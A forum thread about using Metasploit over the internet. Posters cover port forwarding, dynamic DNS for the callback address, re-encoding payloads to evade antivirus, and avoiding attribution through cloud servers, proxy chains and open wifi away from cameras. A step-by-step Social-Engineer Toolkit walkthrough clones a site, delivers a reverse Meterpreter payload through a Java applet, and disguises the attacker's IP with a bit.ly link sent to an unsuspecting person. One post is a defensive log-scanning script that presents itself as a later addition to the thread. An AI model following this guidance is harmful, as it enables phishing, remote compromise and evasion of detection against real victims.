
Metasploit Over The Internet


ocram6616967


You can do it over the internet, but 1, if you have a router you need to port forward to the box running Metasploit so you can receive the calls back, and 2, if the target is behind NAT, you need to use some sort of phishing attack or file download, email payload that gets them to click something to point them at you. Most targets these days aren't sitting right on the modem directly. Although, if you look at HD Moore's talk yesterday from Derbycon, he scanned the entire internet and found thousands of Windows workstations connected directly to the internet, not behind NAT. We're talking Windows 2000 machines, Windows 7, Vista, even NT 4 and Win 3.1 I think he saw. Check the video on Irongeek's YouTube channel.


OK. So, when I create the "exe" I must set "LHOST" to my public IP address (not 192.168.1.X), is that right? Thanks


Yes, use your public IP and if need be, set your machine to be in a DMZ (you can use a virtual machine and set it to bridged to get an IP from the router and put itself in the DMZ too). Just know when in the DMZ, you're exposed to the internet too, and if you use, say, BackTrack with all default passwords and you hack someone, they can hack right back and log in to your machine remotely with root/toor and also the default settings and usernames/passwords for the database, etc. One of the reasons they always say to use it on a live disc vs native installs, or in a VM you can revert snapshots to.


Quick one guys: would it not be best to set LHOST at a server in the cloud and listen on that server? Would that not partially mask yourself, as opposed to if the "victim's" PC was saying THISPROGRAM.exe is trying to gain access to 276.65.8.98 (your IP address)? Just a suggestion for masking yourself; would this work or be worth doing, or would you be able to SSH the traffic through another computer elsewhere?

Not that you'd be doing this from home obviously :) but you know, if you had a 3G dongle with a pay-as-you-go SIM card and were trying to gain access to your home network "on the go" this way, that sounds fun :)

just to confuse your "home router" :)


If you 1, have a VPS you can install Metasploit on then yes, but it still comes back to your VPS, or 2, proxychained your connection through several hops, you could also do that too, but you have to make sure all traffic is encrypted too, because some sites you hop through might see the attack and filter/block it in its path back and forth. Depends on the network, but a lot of people use Linode, Rackspace and Amazon cloud services with their own VPS and remote desktop into the machines to run attacks from the cloud, so it can surely be done. As for making someone not know it's you, if it's traced back to your account on the cloud server, kind of obvious it's still you. If paranoid about all of that, you would need to use open wifi at a location far from your home, cameras and people, in an area you can conceal your actions and not have to spend a whole lot of time at, since these would be like one-off hacks where you use a location to do your attack, then move on and never come back to the same place.

Everything on the internet is traceable to the last hop, up to a point, and even if you use, say, TOR, someone could find that TOR exit node and have them shut down, which might keep you safe so long as the TOR exit nodes don't keep logs, but you also then ruin the TOR service for people who use it for legit reasons. I love TOR, but I block it on my sites for that reason alone, because people have attacked my sites over TOR, and it's why I wrote TOR block for WordPress. I don't believe in censorship, but I also don't believe in using free services like TOR for nefarious use when you ruin it for legit people who need it to fight censorship and country roadblocks to information.


I wasn't suggesting using TOR, because the more exit nodes there are, the better, and we don't want them getting shut down :). I was suggesting the method of through the cloud which digip mentioned, and with regards to free wifi access points, to save some time searching for a wifi point if you aren't mad on wardriving. Some people are; I'm still waiting till I can afford a GPS dongle to go war-cycling around Manchester :) so I can add my results to the cloud on http://wigle.net/ ;) where free access points are easier to find than running round with your laptop out running airodump or Wicd :)


Ah... the good old days of NetStumbler in Windows XP and a GPS. I used to plot access points on Google Earth and make KML files from the NetStumbler logs with icons for wifi access points wherever I drove. Fun times...


Are there still people out there that do things the "old fashioned" way? Don't get me wrong, Metasploit is an amazing tool, and I will probably find it more amazing the more I delve into learning Ruby, but I just can't help but feel I am missing out on something when I use Metasploit...


Metasploit is a double-edged sword. On the one hand, if you got a sploit that works, great. On the other, it can be very daunting and difficult to make use of it, because so much of what Metasploit does is leverage exploits and help automate the payload, but often you need to roll your own shellcode, so you need to know a little about attacking in general. Metasploit allows you to leverage vulns you find and help speed up the process, and pick different payloads once you pop the box, and then from there can help you pivot and expand your presence and persistence. Prime example, Cobalt Strike, which makes using Metasploit that much easier, and adds collaboration, so multiple people can work in tandem, real-time chatting and sharing of sessions to attack with different skill sets from each person, so it's very powerful, but also a lot to learn and undertake. Honestly, most I've ever been successful with it on is MS08-067 in just testing against my own XP VMs, but that's only because I don't know a 16th of how to really use it.

Hi guys. Metasploit into the LAN works fine, now I'm thinking of using the framework over the internet (for example with a classic payload .exe). How can I do it? I have a dynamic IP and I don't want to purchase a static IP from my ISP. Thanks :D

To get your payload to connect back to your attacker machine, you definitely need to enable port forwarding in your router. Also, since you are using a dynamic IP address, I would recommend you look into dyndns.org or no-ip.com; you need to find out which of the two your router supports.

When logging into your router, there should be an option called DDNS or something similar. In there, you will need to supply your no-ip.com or dyndns.org account details, so that whenever your external IP address changes, it gets synced with the URL.

Edited by Infiltrator

If you have a strong command of the msf api, it can speed up certain things, but it won't make/break you. It's also pretty simple to edit their scripts to your liking, but as a rule of thumb try to create your own code in your language of choice, then if need be you can port it to metasploit. The "old fashioned" way as you say, is really the only way to do it.

Edited by bobbyb1980

OK. My router is already port forwarded. I have a no-ip account synchronized with the DDNS of my router and it works great. So, shall I set LHOST with the no-ip address instead of my IP address (example.no-ip.com instead of 151.28.200.60)? Thanks


Correct, that's how it should be done (example.no-ip.com instead of 151.28.200.60)! If you do it the other way around, the payload will have problems finding your attacker machine when the Ext IP address changes.


OK thanks! Another question... Do you know any (working) exploit to send (for example with an email) to a Windows XP machine (not found by firewall and antivirus)? Thanks


Well, most if not all exploits will be detected by antivirus. The only way to make them undetected is using the built-in Metasploit encoders. Shinatakagai, if that's how it's spelt, is one of the recommended encoders within the Metasploit framework to use.

Sometimes you will notice that encoding the payload once will not do the trick; you have to encode it multiple times in order to achieve a good undetected rate.

Edited by Infiltrator

Hi guys, not been on in a while, here's a quick tut I wrote.

I ADVISE DOING THIS FROM A LIVE USB OF BACKTRACK AS YOU WILL BE EXPOSED TO THE INTERNET (CAN BE DANGEROUS)

Startup SET

++++++++++++++++

Select 1) Social-Engineering Attacks

++++++++++++++++

++++++++++++++++

Select 2) Website Attack Vectors

++++++++++++++++

++++++++++++++++

Select 1) Java Applet Attack Method

++++++++++++++++

++++++++++++++++

Select 2) Site Cloner

++++++++++++++++

[-] NAT/Port Forwarding can be used in the cases where your SET machine is

[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]:

++++++++++++++++

Select YES

++++++++++++++++

set:webattack> IP address to SET web server (this could be your external IP or hostname):

++++++++++++++++

Type in your external IP (open terminal and type "curl ifconfig.me" to find what it is)

++++++++++++++++

set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:

++++++++++++++++

Select NO

++++++++++++++++

set:webattack> Enter the url to clone:

++++++++++++++++

Enter a website you want to clone (http://www.website.com)

++++++++++++++++

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker

2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker

3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker

4) Windows Bind Shell Execute payload and create an accepting port on remote system

5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline

6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline

7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter

8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports

9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter

11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET

12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP

14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec

15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector

16) Import your own executable Specify a path for your own executable

++++++++++++++++

Select 14) ShellCodeExec Alphanum Shellcode

++++++++++++++++

set:payloads> PORT of the listener [443]:

++++++++++++++++

Press enter for default port 443

++++++++++++++++

Select the payload you want to deliver via shellcodeexec

1) Windows Meterpreter Reverse TCP

2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager

4) Windows Meterpreter (ALL PORTS) Reverse TCP

++++++++++++++++

Select 1) Windows Meterpreter Reverse TCP

++++++++++++++++

Wait a while, it will generate the payloads then start Metasploit.

While you're waiting, log into your router, probably 192.168.x.x, and look for the DMZ option; it should be under NAT or advanced.

Enter your local IP into the DMZ field ("ifconfig" in terminal to get LAN IP, sure you know that though).

Go to https://bitly.com/, enter your external IP and you will get a link something like http://bit.ly/a00d7M.

Give someone the link and hope they have Java installed.

Happy Hacking, Reflex.


Dynamic DNS such as No-Ip or DynDNS also works very well over or combined with the bitly links. Some people panic when the website name is just an IP Address for some reason :rolleyes:

Edited by Radau
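
Seen from the defending side, the delivery pattern in the posts above (a shortened link fronting a bare external IP or a no-ip/dyndns hostname that then serves a Java applet) leaves a recognisable trail in web proxy logs. The Python below is an added example, not part of the thread or of any tool it mentions; the log layout, the function names and every sample line are constructed for illustration, and the suffix and shortener lists hold only the services named in the thread.

```python
import ipaddress
from typing import NamedTuple
from urllib.parse import urlsplit

# Providers and shortener named in the thread; extend both lists for real use.
DDNS_SUFFIXES = ("no-ip.com", "dyndns.org")
SHORTENERS = ("bit.ly", "bitly.com")
JAR_TYPES = ("application/java-archive", "application/x-java-archive")

# Constructed sample proxy log (assumed layout):
# time client method url status redirect-location content-type
SAMPLE_LOG = """\
2012-10-01T10:00:01Z 10.0.0.21 GET http://bit.ly/EXAMPLE1 301 http://203.0.113.7/ -
2012-10-01T10:00:02Z 10.0.0.21 GET http://203.0.113.7/ 200 - text/html
2012-10-01T10:00:03Z 10.0.0.21 GET http://203.0.113.7/applet.jar 200 - application/java-archive
2012-10-01T10:01:10Z 10.0.0.34 GET http://bit.ly/EXAMPLE2 301 http://www.example.org/news -
2012-10-01T10:02:00Z 10.0.0.40 GET http://example.no-ip.com:8080/a.jar 200 - application/java-archive
2012-10-01T10:03:00Z 10.0.0.40 GET http://www.example.org/lib.jar 200 - application/java-archive
""".splitlines()


class Finding(NamedTuple):
    time: str
    client: str
    severity: str
    rule: str
    url: str


def host_of(url: str) -> str:
    """Lower-cased host part of a URL, without port or trailing dot."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def classify_destination(url: str) -> list:
    """Return the reasons a destination looks like a home or lab listener."""
    host, reasons = host_of(url), []
    try:
        ipaddress.ip_address(host)
        reasons.append("bare-ip-host")
    except ValueError:
        pass
    if any(host == s or host.endswith("." + s) for s in DDNS_SUFFIXES):
        reasons.append("dynamic-dns-host")
    return reasons


def scan(lines) -> list:
    findings, redirected = [], set()  # redirected: (client, host) reached via a short link
    for line in lines:
        fields = line.split()
        if len(fields) != 7:
            continue  # skip malformed records
        ts, client, _method, url, _status, location, ctype = fields
        host = host_of(url)
        if host in SHORTENERS and location != "-" and classify_destination(location):
            redirected.add((client, host_of(location)))
            findings.append(Finding(ts, client, "medium", "shortener-to-raw-host", url))
        elif ctype in JAR_TYPES and classify_destination(url):
            # A JAR from such a host is worse when the same client arrived via a short link.
            chained = (client, host) in redirected
            findings.append(Finding(ts, client, "high" if chained else "medium",
                                    "jar-after-shortener" if chained else "jar-from-raw-host", url))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A bare IP or dynamic-DNS host on its own is a weak signal, which is why the high severity is reserved for the chained case.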

That's how I used to access my virtual servers before I went and purchased a domain. I hated having to remember my IP every time it changed.


GREATT!! B) Does it also work with Windows Vista/7? Thanks


It should if that version has SET (which it should), I haven't ever tried Metasploit from Windows actually. I will find out soon enough how well it works on Android... as soon as msfupdate is completed. I swear it has been running for about 12 hours now, oh well, patience is a virtue I suppose. B)
